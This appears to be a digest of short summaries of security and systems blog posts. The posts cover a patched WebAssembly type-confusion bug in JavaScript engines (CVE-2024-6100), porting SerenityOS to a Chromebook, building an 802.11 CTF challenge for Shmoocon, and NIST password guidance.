Overview of WebAssembly Type Confusion in JavaScript Engines Exploitation - This article discusses the exploitation of WebAssembly type confusion in JavaScript engines, focusing on the introduction of more complex types through the WebAssembly Garbage Collection (WASMGC) extension. It explains how type comparisons between types from recursive groups in different modules can lead to type confusion. The proof of concept demonstrates how to craft a type confusion between types with different indexes by manipulating relative indexes. Lastly, it mentions Google's patch for fixing CVE-2024-6100 by checking the canonical type index when adding recursive groups.
Bringing SerenityOS to real hardware, one driver at a time - This post discusses bringing SerenityOS to real hardware, focusing on porting the OS to a Chromebook. The author encounters challenges with debugging hardware, eventually leading to successful access to the serial console. Additionally, the author works on implementing a driver for the eMMC storage on the Chromebook, facing issues related to differences between MMC and SD protocols. The post concludes with progress made in getting the graphical session partially running on the Chromebook.
The Packets Are Inside The Computer - Building 802.11 Challenges in Congested 802.11 Environments - This blog post discusses the development of an 802.11 challenge for the final Hack Fortress event at Shmoocon, focusing on the congested 802.11 environment at the conference. By using the Linux kernel's hwsim module, competitors were able to capture beacon frames, parse SSIDs, and solve challenges without broadcasting over RF. The blog details the process of building and flashing a custom OpenWRT image for not officially supported hardware and creating a challenge for competitors to solve by decoding SSIDs. The author concludes by reflecting on the fun and learning experienced while developing the challenge and participating in CTF events.
Solving NIST Password Complexities: Guidance From a GRC Perspective - TrustedSec's blog discusses aligning password policies with NIST's guidelines from a Governance, Risk, and Compliance (GRC) perspective. The post highlights that while traditional complex password requirements (e.g., special characters, frequent resets) are often enforced, NIST advocates for user-friendly practices such as longer passwords, avoiding periodic resets unless a breach occurs, and eliminating arbitrary complexity rules.
Comments